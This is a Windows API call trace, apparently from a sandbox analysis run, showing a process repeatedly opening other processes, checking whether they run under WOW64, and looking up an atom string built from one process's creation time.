	[0080.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0080.289] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.289] CloseHandle (hObject=0x224) returned 1
	[0080.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0080.289] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.289] CloseHandle (hObject=0x224) returned 1
	[0080.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0080.289] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.289] CloseHandle (hObject=0x224) returned 1
	[0080.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0080.290] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.290] CloseHandle (hObject=0x224) returned 1
	[0080.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0080.290] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.290] CloseHandle (hObject=0x224) returned 1
	[0080.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0080.290] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.290] CloseHandle (hObject=0x224) returned 1
	[0080.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0080.290] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.290] CloseHandle (hObject=0x224) returned 1
	[0080.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0080.290] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.290] CloseHandle (hObject=0x224) returned 1
	[0080.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0080.290] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.290] CloseHandle (hObject=0x224) returned 1
	[0080.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0080.290] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.290] CloseHandle (hObject=0x224) returned 1
	[0080.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0080.291] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.291] CloseHandle (hObject=0x224) returned 1
	[0080.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0080.291] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.291] CloseHandle (hObject=0x224) returned 1
	[0080.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0080.291] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.291] CloseHandle (hObject=0x224) returned 1
	[0080.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0080.291] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.291] CloseHandle (hObject=0x224) returned 1
	[0080.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0080.291] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.291] CloseHandle (hObject=0x224) returned 1
	[0080.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0080.291] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.291] CloseHandle (hObject=0x224) returned 1
	[0080.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0080.292] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.292] CloseHandle (hObject=0x224) returned 1
	[0080.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0080.292] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.292] CloseHandle (hObject=0x224) returned 1
	[0080.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0080.292] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.292] CloseHandle (hObject=0x224) returned 1
	[0080.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0080.292] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0080.292] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0080.292] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0080.293] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0080.293] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0080.293] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0080.293] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0080.293] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0080.293] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0080.293] CloseHandle (hObject=0x224) returned 1
	[0080.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0080.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0080.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0080.293] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.293] CloseHandle (hObject=0x224) returned 1
	[0080.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0080.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0080.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0080.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0080.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0080.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0080.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0080.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0080.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0080.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0080.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0080.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0080.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0080.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0080.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0080.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0080.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0080.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0080.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0080.364] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.364] CloseHandle (hObject=0x224) returned 1
	[0080.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0080.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0080.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0080.364] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.364] CloseHandle (hObject=0x224) returned 1
	[0080.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0080.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0080.365] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.365] CloseHandle (hObject=0x224) returned 1
	[0080.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0080.365] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.365] CloseHandle (hObject=0x224) returned 1
	[0080.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0080.365] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.365] CloseHandle (hObject=0x224) returned 1
	[0080.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0080.365] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.365] CloseHandle (hObject=0x224) returned 1
	[0080.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0080.365] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.365] CloseHandle (hObject=0x224) returned 1
	[0080.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0080.365] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.365] CloseHandle (hObject=0x224) returned 1
	[0080.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0080.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0080.366] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.366] CloseHandle (hObject=0x224) returned 1
	[0080.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0080.366] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.366] CloseHandle (hObject=0x224) returned 1
	[0080.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0080.366] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.366] CloseHandle (hObject=0x224) returned 1
	[0080.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0080.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0080.366] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.366] CloseHandle (hObject=0x224) returned 1
	[0080.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0080.366] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.367] CloseHandle (hObject=0x224) returned 1
	[0080.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0080.367] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.367] CloseHandle (hObject=0x224) returned 1
	[0080.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0080.367] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.367] CloseHandle (hObject=0x224) returned 1
	[0080.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0080.367] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.367] CloseHandle (hObject=0x224) returned 1
	[0080.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0080.367] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.367] CloseHandle (hObject=0x224) returned 1
	[0080.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0080.367] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.367] CloseHandle (hObject=0x224) returned 1
	[0080.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0080.368] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.368] CloseHandle (hObject=0x224) returned 1
	[0080.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0080.368] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.368] CloseHandle (hObject=0x224) returned 1
	[0080.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0080.368] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.368] CloseHandle (hObject=0x224) returned 1
	[0080.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0080.368] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.368] CloseHandle (hObject=0x224) returned 1
	[0080.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0080.368] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.368] CloseHandle (hObject=0x224) returned 1
	[0080.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0080.368] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.368] CloseHandle (hObject=0x224) returned 1
	[0080.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0080.368] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.369] CloseHandle (hObject=0x224) returned 1
	[0080.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0080.369] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.369] CloseHandle (hObject=0x224) returned 1
	[0080.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0080.369] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.369] CloseHandle (hObject=0x224) returned 1
	[0080.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0080.369] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.369] CloseHandle (hObject=0x224) returned 1
	[0080.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0080.369] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.369] CloseHandle (hObject=0x224) returned 1
	[0080.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0080.369] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.369] CloseHandle (hObject=0x224) returned 1
	[0080.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0080.369] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.369] CloseHandle (hObject=0x224) returned 1
	[0080.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0080.370] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0080.370] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0080.370] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0080.370] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0080.370] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0080.370] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0080.370] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0080.371] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0080.371] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0080.371] CloseHandle (hObject=0x224) returned 1
	[0080.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0080.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0080.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0080.371] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.371] CloseHandle (hObject=0x224) returned 1
	[0080.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0080.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0080.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0080.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0080.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0080.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0080.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0080.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0080.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0080.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0080.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0080.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0080.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0080.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0080.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0080.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0080.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0080.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0080.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x28c
	[0080.525] IsWow64Process (in: hProcess=0x28c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.525] CloseHandle (hObject=0x28c) returned 1
	[0080.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0080.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0080.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x28c
	[0080.526] IsWow64Process (in: hProcess=0x28c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.526] CloseHandle (hObject=0x28c) returned 1
	[0080.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0080.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x28c
	[0080.526] IsWow64Process (in: hProcess=0x28c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.526] CloseHandle (hObject=0x28c) returned 1
	[0080.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x28c
	[0080.526] IsWow64Process (in: hProcess=0x28c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.526] CloseHandle (hObject=0x28c) returned 1
	[0080.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x28c
	[0080.526] IsWow64Process (in: hProcess=0x28c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.527] CloseHandle (hObject=0x28c) returned 1
	[0080.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x28c
	[0080.527] IsWow64Process (in: hProcess=0x28c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.527] CloseHandle (hObject=0x28c) returned 1
	[0080.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x28c
	[0080.527] IsWow64Process (in: hProcess=0x28c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.527] CloseHandle (hObject=0x28c) returned 1
	[0080.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x28c
	[0080.527] IsWow64Process (in: hProcess=0x28c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.527] CloseHandle (hObject=0x28c) returned 1
	[0080.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0080.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x28c
	[0080.527] IsWow64Process (in: hProcess=0x28c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.527] CloseHandle (hObject=0x28c) returned 1
	[0080.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x28c
	[0080.527] IsWow64Process (in: hProcess=0x28c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.527] CloseHandle (hObject=0x28c) returned 1
	[0080.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x28c
	[0080.528] IsWow64Process (in: hProcess=0x28c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.528] CloseHandle (hObject=0x28c) returned 1
	[0080.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0080.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x28c
	[0080.528] IsWow64Process (in: hProcess=0x28c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.528] CloseHandle (hObject=0x28c) returned 1
	[0080.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x28c
	[0080.528] IsWow64Process (in: hProcess=0x28c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.528] CloseHandle (hObject=0x28c) returned 1
	[0080.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x28c
	[0080.528] IsWow64Process (in: hProcess=0x28c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.528] CloseHandle (hObject=0x28c) returned 1
	[0080.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x28c
	[0080.528] IsWow64Process (in: hProcess=0x28c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.528] CloseHandle (hObject=0x28c) returned 1
	[0080.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x28c
	[0080.529] IsWow64Process (in: hProcess=0x28c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.529] CloseHandle (hObject=0x28c) returned 1
	[0080.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x28c
	[0080.529] IsWow64Process (in: hProcess=0x28c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.529] CloseHandle (hObject=0x28c) returned 1
	[0080.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x28c
	[0080.529] IsWow64Process (in: hProcess=0x28c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.529] CloseHandle (hObject=0x28c) returned 1
	[0080.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x28c
	[0080.529] IsWow64Process (in: hProcess=0x28c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.529] CloseHandle (hObject=0x28c) returned 1
	[0080.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x28c
	[0080.529] IsWow64Process (in: hProcess=0x28c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.529] CloseHandle (hObject=0x28c) returned 1
	[0080.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x28c
	[0080.529] IsWow64Process (in: hProcess=0x28c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.529] CloseHandle (hObject=0x28c) returned 1
	[0080.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x28c
	[0080.530] IsWow64Process (in: hProcess=0x28c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.530] CloseHandle (hObject=0x28c) returned 1
